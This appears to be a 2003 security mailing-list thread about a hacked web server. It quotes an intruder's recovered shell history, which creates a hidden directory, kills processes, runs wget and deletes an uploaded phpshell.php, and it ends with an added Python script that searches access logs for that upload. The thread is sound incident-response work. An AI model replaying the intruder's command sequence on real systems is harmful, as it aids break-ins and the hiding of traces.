The problem is starting >>before<<
   id
   mkdir /etc/.rpn
   ...
You should think about everything that's listening on a port:
- an outdated sshd? (!)
- security updates all up to date?
- known unclosed security hole?
- some nice scripts like 'rootshell.php'? ;)
- perl without tainting checks in cgi-bin?
etc. etc.

Christian

-----Original Message-----
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: [email protected]
Subject: Re: [sec] Re: Strange segmentation faults and Zombies

maximilian attems wrote:
> On Thu, 18 Sep 2003, Christian Storch wrote:
>
>
>>Don't forget to try to find the potential hole first!
>>Otherwise you could have a fast recurrence.
>>[..]
>>
>>>>in /etc/.rpn there's a .bash_history with the following content:
>>>>
>>>>>id
>>>>>mkdir /etc/.rpn
>>>>>ps -aux
>>>>>ps -aux | grep tbk
>>>>>kill -15292 pid
>>>>>kill 15292
>>>>>netconf
>>>>>locate httpd.conf
>>>>>cd /etc/.rpn
>>>>>ls -al
>>>>>wget
>>>>>cd /var/www/cncmap/www/upload/renegade
>>>>>ls -al
>>>>>rm -rf phpshell.php
>
>           ^__________^
> was this the exploited hole ?

I think so. In fact the problem is that it got there...

regards
Markus
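Added example, not part of the original thread: one way to look for what happened before the first `id` in that history is to search the web server's access log for successful requests to script files under the upload directory that predate the creation of /etc/.rpn. The log lines, the cutoff time, the `/upload/` URL prefix and the function name are constructed assumptions, not values from the affected host.

```python
import re
from datetime import datetime

# Constructed sample lines in Apache combined log format (not from the thread).
SAMPLE_LOG = """\
192.0.2.10 - - [17/Sep/2003:22:01:13 +0200] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
192.0.2.44 - - [17/Sep/2003:23:40:02 +0200] "POST /upload/renegade/ HTTP/1.0" 200 312 "-" "Mozilla/4.0"
192.0.2.44 - - [17/Sep/2003:23:41:55 +0200] "GET /upload/renegade/phpshell.php HTTP/1.0" 200 97 "-" "Mozilla/4.0"
192.0.2.10 - - [18/Sep/2003:09:15:00 +0200] "GET /upload/logo.png HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
192.0.2.44 - - [18/Sep/2003:10:02:41 +0200] "GET /upload/renegade/phpshell.php HTTP/1.0" 404 210 "-" "Mozilla/4.0"
"""

TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
# Assumed creation time of /etc/.rpn (in practice, taken from the directory's timestamps).
CUTOFF = datetime.strptime("18/Sep/2003:00:30:00 +0200", TS_FORMAT)

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions a web server may execute; an upload directory should serve none of them.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|pl|cgi)$", re.IGNORECASE)


def suspicious_requests(log_text, upload_prefix, cutoff):
    """Return (time, ip, method, path) for successful requests to script
    files below upload_prefix that happened before cutoff."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        when = datetime.strptime(m["ts"], TS_FORMAT)
        path = m["path"].split("?", 1)[0]  # ignore the query string
        if when >= cutoff or not path.startswith(upload_prefix):
            continue
        if SCRIPT_EXT.search(path) and m["status"].startswith("2"):
            hits.append((when, m["ip"], m["method"], path))
    return sorted(hits)


if __name__ == "__main__":
    for when, ip, method, path in suspicious_requests(SAMPLE_LOG, "/upload/", CUTOFF):
        print(when.isoformat(), ip, method, path)
```

The source address of each hit can then be followed backwards through the same log to find the request that placed the file in the upload directory.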

